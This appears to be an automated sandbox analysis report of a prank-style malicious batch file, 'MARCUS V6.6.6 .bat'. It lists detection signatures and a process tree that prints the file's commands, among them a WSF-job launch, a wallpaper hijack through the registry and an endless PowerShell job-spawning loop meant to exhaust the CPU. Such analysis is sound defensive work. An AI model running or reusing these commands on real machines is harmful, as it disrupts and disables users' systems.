Analysis

  • max time kernel
    154s
  • max time network
    140s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64
    arch:x86
    image:win10v2004-20250314-en
    locale:en-us
    os:windows10-2004-x64
    system
  • submitted
    02/05/2025, 10:53

General

  • Target

    https://www.mediafire.com/file/x2gpxs8tk4fud03/MARCUS+V6.6.6+.bat/file

Malware Config

Signatures

  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

    Using powershell.exe command.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 23 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.mediafire.com/file/x2gpxs8tk4fud03/MARCUS+V6.6.6+.bat/file
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4436
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2cc,0x2a0,0x2d0,0x2c8,0x2d8,0x7fff2494f208,0x7fff2494f214,0x7fff2494f220
      2⤵
      PID:4852
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2240,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:2
      2⤵
      PID:1624
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1920,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=2348 /prefetch:3
      2⤵
      PID:468
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2616,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=2696 /prefetch:8
      2⤵
      PID:5024
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3452,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=3548 /prefetch:1
      2⤵
      PID:184
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3480,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=3536 /prefetch:1
      2⤵
      PID:2100
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4248,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=4256 /prefetch:1
      2⤵
      PID:5104
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4312,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=4292 /prefetch:2
      2⤵
      PID:4340
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5128,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=5088 /prefetch:8
      2⤵
      PID:4200
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5380,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=5388 /prefetch:8
      2⤵
      PID:3224
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --always-read-main-dll --field-trial-handle=6088,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6072 /prefetch:1
      2⤵
      PID:3940
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5160,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=5928 /prefetch:8
      2⤵
      PID:4296
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5936,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=5924 /prefetch:8
      2⤵
      PID:4220
    • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6256,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6272 /prefetch:8
      2⤵
      PID:968
    • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6256,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6272 /prefetch:8
      2⤵
      PID:3324
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6484,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6508 /prefetch:8
      2⤵
      PID:4164
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6516,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6544 /prefetch:8
      2⤵
      PID:1668
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6912,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6392 /prefetch:8
      2⤵
      PID:4928
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6540,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6692 /prefetch:8
      2⤵
      PID:2032
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6536,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6680 /prefetch:8
      2⤵
      PID:1264
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6588,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6720 /prefetch:8
      2⤵
      PID:1144
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7244,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=7252 /prefetch:8
      2⤵
      PID:3568
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7240,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6668 /prefetch:8
      2⤵
      PID:888
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --always-read-main-dll --field-trial-handle=4268,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=4252 /prefetch:1
      2⤵
      PID:5636
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --always-read-main-dll --field-trial-handle=6732,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=7060 /prefetch:1
      2⤵
      PID:5996
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --always-read-main-dll --field-trial-handle=4380,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6836 /prefetch:1
      2⤵
      PID:6016
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --always-read-main-dll --field-trial-handle=7352,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=7292 /prefetch:1
      2⤵
      PID:4204
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --always-read-main-dll --field-trial-handle=7120,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6808 /prefetch:1
      2⤵
      PID:2600
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=7416,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6608 /prefetch:1
      2⤵
      PID:2292
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --always-read-main-dll --field-trial-handle=7568,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=7504 /prefetch:1
      2⤵
      PID:5184
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --always-read-main-dll --field-trial-handle=7196,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6888 /prefetch:1
      2⤵
      PID:5572
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --always-read-main-dll --field-trial-handle=7176,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=7220 /prefetch:1
      2⤵
      PID:4948
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4340,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=3684 /prefetch:8
      2⤵
      PID:5864
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --always-read-main-dll --field-trial-handle=4232,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=7744 /prefetch:1
      2⤵
      PID:5872
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8108,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=8120 /prefetch:8
      2⤵
      PID:5888
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --always-read-main-dll --field-trial-handle=4276,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=3468 /prefetch:1
      2⤵
      PID:5124
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --always-read-main-dll --field-trial-handle=7728,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=8008 /prefetch:1
      2⤵
      PID:6084
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=8232,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=8240 /prefetch:1
      2⤵
      PID:5892
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4504,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6668 /prefetch:8
      2⤵
      PID:5224
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4540,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=4556 /prefetch:8
      2⤵
      PID:5064
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7684,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=4324 /prefetch:8
      2⤵
      PID:3172
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7732,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=7948 /prefetch:8
      2⤵
      PID:6428
  • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
    1⤵
    PID:3232
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:5344
  • C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat"
    1⤵
    PID:5104
    • C:\Windows\system32\chcp.com
      chcp 1250
      2⤵
                                                                                                PID:5424
                                                                                              • C:\Windows\system32\mode.com
                                                                                                mode 85,30
                                                                                                2⤵
                                                                                                  PID:5700
                                                                                                • C:\Windows\system32\wscript.exe
                                                                                                  wscript.exe "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat?.WSF//Job:Nyan"
                                                                                                  2⤵
                                                                                                    PID:876
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -c "(New-Object Media.SoundPlayer 'C:\Windows\Media\alarm.mp3').PlayLooping()"
                                                                                                    2⤵
                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:4360
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\magnus\matrix.bmp" /f
                                                                                                    2⤵
                                                                                                    • Sets desktop wallpaper using registry
                                                                                                    PID:3120
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -c "while(1) { Start-Job -ScriptBlock { while(1) { [Math]::Pow([Math]::PI, [Math]::E) } } }"
                                                                                                    2⤵
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:3968
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:5600
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:5168
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:6088
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:5216
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:5192
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:4452
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:5164
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:5416
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:1620
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:5428
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:5992
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:6204
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:6328
